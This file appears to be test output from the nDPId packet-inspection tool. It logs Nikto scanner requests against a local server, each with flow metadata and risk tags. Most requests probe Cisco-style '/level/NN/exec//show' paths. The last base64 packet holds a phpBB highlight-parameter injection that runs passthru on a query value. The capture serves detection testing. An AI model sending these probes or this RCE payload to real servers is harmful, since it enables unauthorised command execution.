{"hostname":"127.0.0.1","url":"127.0.0.1\/level\/89\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001336)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1576420277723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277723,"pkt":"AAAAAAAAAAAAAAAACABFAADIo9hAAEAGmFV\/AAABfwAAAcaWH5BWPprB7Bx1PYAYAED+vAAAAQEICp1m\/wKdZv8CR0VUIC9sZXZlbC85MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/90\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001337)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1576420277725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277725,"pkt":"AAAAAAAAAAAAAAAACABFAADI7YBAAEAGTq1\/AAABfwAAAcaYH5AUj9RqmT7XtIAYAED+vAAAAQEICp1m\/wWdZv8FR0VUIC9sZXZlbC85MS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/91\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001338)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1576420277727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277727,"pkt":"AAAAAAAAAAAAAAAACABFAADIYyZAAEAG2Qd\/AAABfwAAAcaaH5DSD1o0DsX43oAYAED+vAAAAQEICp1m\/wadZv8GR0VUIC9sZXZlbC85Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/92\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001339)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1576420277729,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277729,"pkt":"AAAAAAAAAAAAAAAACABFAADIxzpAAEAGdPN\/AAABfwAAAcacH5ALNv4hgWKnmoAYAED+vAAAAQEICp1m\/widZv8IR0VUIC9sZXZlbC85My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/93\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001340)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1576420277730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277730,"pkt":"AAAAAAAAAAAAAAAACABFAADIHv9AAEAGHS9\/AAABfwAAAcaeH5AL7Sfmt4JqA4AYAED+vAAAAQEICp1m\/wqdZv8KR0VUIC9sZXZlbC85NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDEpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/94\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001341)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1576420277732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277732,"pkt":"AAAAAAAAAAAAAAAACABFAADIPWZAAEAG\/sd\/AAABfwAAAcagH5BD6AR+QNLU5oAYAED+vAAAAQEICp1m\/wydZv8MR0VUIC9sZXZlbC85NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/95\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001342)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1576420277734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277734,"pkt":"AAAAAAAAAAAAAAAACABFAADISBNAAEAG9Bp\/AAABfwAAAcaiH5A0bnEJpPWxcYAYAED+vAAAAQEICp1m\/w6dZv8OR0VUIC9sZXZlbC85Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/96\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001343)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1576420277736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277736,"pkt":"AAAAAAAAAAAAAAAACABFAADIC2JAAEAGMMx\/AAABfwAAAcakH5C2tzJ7p90VYYAYAED+vAAAAQEICp1m\/xCdZv8PR0VUIC9sZXZlbC85Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/97\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001344)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1576420277737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277737,"pkt":"AAAAAAAAAAAAAAAACABFAADIqydAAEAGkQZ\/AAABfwAAAcamH5BRA5JApfKSEYAYAED+vAAAAQEICp1m\/xGdZv8RR0VUIC9sZXZlbC85OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/98\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001345)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1576420277739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277739,"pkt":"AAAAAAAAAAAAAAAACABFAADI+OxAAEAGQ0F\/AAABfwAAAcaoH5BlRMHxT\/ad\/4AYAED+vAAAAQEICp1m\/xOdZv8SR0VUIC9sZXZlbC85OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/99\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001346)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1576420277741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277741,"pkt":"AAAAAAAAAAAAAAAACABFAAFdQfFAAEAG+ad\/AAABfwAAAcaqH5DRIHj1tdpDy4AYAED\/UQAAAQEICp1m\/xWdZv8VR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM4OCkNCg0K"} 